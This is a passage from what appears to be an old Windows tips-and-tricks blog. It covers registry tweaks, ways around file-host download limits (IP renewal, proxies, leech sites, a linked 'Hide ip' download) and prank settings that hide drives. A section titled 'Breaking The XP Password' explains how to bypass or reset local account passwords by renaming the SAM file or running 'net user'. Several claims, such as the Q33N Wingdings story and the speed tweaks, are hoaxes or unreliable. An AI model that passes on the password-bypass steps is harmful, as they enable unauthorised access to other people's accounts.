4.a pop up message will come click ok your counter is zero just download the stu

Method 2

1.Delete the cookies in your browser(internet explorer or firefox or opera or whatever u use).
2.Press start->run,type cmd.
3.In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit.
4.Now try downloading,for many people this may work if their ISP provides a dynamic ip.

Method 3

1.Just switch off your router(or modem) and switch it back on.
2.This may work for some users(Mtnl and Bsnl) and maybe some others too.

Actually these methods generally work for those people whose ISP gives them dynamic ip.
If these dont work then one more thing that can be done is to use proxies.

Method 3

1.Download the software Hide ip platinum from here http://rapidshare.de/files/34451917/hideipv32.rar

2.Run it,then it will automatically chose a proxy(ip of a different country) for you.So you can easily download without any restrictions.You just have to change the proxy each time you download.

MEGAUPLOAD

Megaupload is very easy to hack(to solve the download slots problem).Just go to http://leech.megaleecher.net/
Here you will find a place to put your original link.Put it there press enter and then you will get a direct link within some seconds.You are done!!!!!

Just check this

0 Comments »
This is unbelievable....try it out....
This is something pretty cool...and unbelievable... At Microsoft the whole
Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself...

Open Microsoft Word and type
=rand (200, 99)
And then press ENTER.

Check this out ....

the flight number of the plane that had hit WTC on 9/11 was Q33N ….

In Notepad, type the flight number i.e. Q33N
Increase the Font Size to 72, Change the Font to Wingdings.
You will be amazed by the findings !!!
8:25 PM

Renaming The Recycle Bin icon

0 Comments »
To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-1 01B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).
8:24 PM

Disabling Display of Drives in My Computer

0 Comments »
This is yet another trick you can play on your geek friend.
To disable the display of local or networked drives when you click My Computer go to :
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer Now in the right pane create a new DWORD item and name it NoDrives.
Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown.
To enable display of drives in My Computer, simply delete this DWORD item.
It's .reg file is as follows: REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplore r] "NoDrives"=dword:03ffffff
8:23 PM

Change Yahoo messenger title bar

0 Comments »
Hey guys you can change the yahoo messenger title bar...
For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:
[APP TITLE]
CAPTION=Red Devil
Here you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.

Lock ur PC yourself

0 Comments »
lock ur pc.. open notepad copy and paste the script below and save it .VBS extention
This wil create a shortcut.. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "LockWorkstation.lnk")
oShellLink.TargetPath = "%windir%system32rundll32.exe"
oShellLink.Arguments = "user32.dll,LockWorkStation"
oShellLink.Save
8:22 PM

Deleting System Softwares

0 Comments »
XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
8:21 PM

Change the Registered User Information

0 Comments »
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.

1) Open RegEdit
2) Got to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion.
3) Change the value of "RegisteredOrganization" or "RegisteredOwner", to what ever you want
8:20 PM

Disabling My Computer

0 Comments »
In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOTCLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. You can also hide all the Desktop Icons, see Change/Add restrictions.
8:20 PM

To Disable Right-Click On Desktop

0 Comments »
Goto Start> RUN and Enter REGEDIT. Browse the following key
HKEY_CURRENT_USERSofwareMicrosoftWindowsCurrentVersionpoliciesExplorer
Create a new DWORD (edit ;new ; dwordvalue ;). With a value=1 ( Rightclick on the newly created DWORD and click on modify then change its value to 1)
Restart Your Computer and you are done.
8:19 PM

Breaking The XP Password

0 Comments »
In case of user password boot the pc in safemode by pressing the F8 key and then selecting the Safe Mode option. You can now logon as an administrator and XP wont prompt for the password. Incase of an administrator account try rebooting the pc in DOS. access C:Windowssystem32configsam . Rename SAM as SAM.mj Now XP wont ask for password next time You Login. Also
1. Go to the cmd prompt .
2. Type net user *.
3. It will list all the users.
4. Again type net user "administrator" or the name of the administrator "name" *.
5. e.g.: net user aaaaaa *(where aaaaaa is the name).
6. It will ask for the password.
7. Type the password and there you are done.
8:19 PM

To Increase the Internet Speed

0 Comments »
Open Notepad and paste the below code in it.

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

Now save this file as speed.reg. Execute it and observe the change!
8:18 PM

Make Your Internet Explorer As Fast As Firefox

0 Comments »
Open registry editor by going to Start then Run and entering regedit.
Once in registry, navigate to key HKEY_CURRENT_USERSoftwaremicrosoftWindowsCurrentVersionInternetSettings.
Right click @ windows right > New > DWORD. type MaxConnectionsPerServer > You can set value (the more higher the no, the more good speed u get, e;g : 99).
Create another DWORD >type MaxConnectionsPer1_0Server.
Then put a high value as mentioned above. Restart I.E and you are done.
8:18 PM